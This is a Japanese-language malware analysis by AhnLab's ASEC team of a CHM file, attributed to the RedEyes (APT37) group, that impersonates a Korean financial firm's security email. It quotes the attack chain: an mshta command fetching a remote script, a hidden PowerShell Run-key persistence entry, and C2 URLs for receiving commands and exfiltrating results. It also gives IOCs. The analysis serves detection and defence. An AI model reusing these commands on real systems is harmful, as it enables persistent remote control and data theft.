韓国国内の金融企業セキュリティメールを詐称した CHM マルウェア：RedEyes(ScarCruft)

ASEC(AhnLab Security Emergency response Center)分析チームは RedEyes 攻撃グループ(also known as APT37、ScarCruft)が製作したと思われる CHM マルウェアが韓国国内のユーザーを対象に拡散している状況を捕捉した。2月に紹介した RedEyes グループの M2RAT マルウェアの攻撃プロセスのうち「2.3.持続性の維持 (Persistence)」プロセスで使用されたコマンドが今回の攻撃でも同じ形態で使用されたことを確認した。この情報を含んだ CHM マルウェアの詳細な動作プロセスは以下で紹介する。

CHM ファイル実行時、韓国国内金融企業のセキュリティメールに詐称したヘルプウィンドウを生成する。この時、CHM 内部に存在する不正なスクリプトが動作し、ユーザーにこのプロセスを気づかせにくくする。このような特徴を利用し、最近になり CHM ファイルを利用したマルウェアの拡散が増えている。

実行される不正なスクリプトは以下の通りであり、以前紹介した CHM マルウェアと同じくショートカットオブジェクト(ShortCut)を利用していた。ショートカットオブジェクトは、Click メソッドを通して呼び出し、Item1 項目に存在するコマンドが実行される。このファイルでは mshta プロセスを通して特定 url に存在する追加スクリプトを実行することになる。

• 実行コマンド
  mshta.exe hxxp://shacc[.]kr/skin/product/1.html

mshta プロセスを通して実行される「1.html」ファイルには JS(JavaScript)コードが含まれており、このコードはエンコードされた PowerShell コマンドを実行する機能を担っている。この時実行される PowerShell コマンドは前述した M2RAT マルウェアの攻撃プロセスで使用されたコマンドと類似した形態である。

デコードされた PowerShell コマンドを確認したところ、C2 アドレス、コマンド実行結果を保存するファイル名、レジストリ値名の他は、2月に使用されたコマンドとコードのすべてが同じであった。このコマンドは、持続性のために RUN キーの登録、攻撃者サーバーからのコマンドの受信、コマンド実行結果の伝達の機能を担っている。

• RUN キー登録
  レジストリパス : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  値名 : icxrNpVd
  値 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html

• C2
  hxxp://shacc[.]kr/skin/product/mid.php?U=[コンピューター名]+[ユーザー名] // 攻撃者コマンドの受信
  hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 エンコード] // コマンド実行結果の伝達

このタイプのマルウェアに感染すると、攻撃者のコマンドに応じてファイルのダウンロードおよび情報窃取などの様々な不正な振る舞いが実行され、大きな被害を受けることがある。特に、韓国国内の特定のユーザーを対象に拡散しているマルウェアは、配布対象によって関心のあるトピックの内容を含んでユーザーの実行を誘導するため、出どころの分からないメールの閲覧は避け、添付ファイルは実行しないようにしなければならない。また、周期的に PC のメンテナンスを行い、セキュリティ製品を最新エンジンにアップデートしなければならない。

[ファイル検知]
Trojan/CHM.Agent (2023.03.03.03)

[IOC]
8d2eebd10d90953cfada64575328ae24
806fad8aac92164f971c04bb4877c00f

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。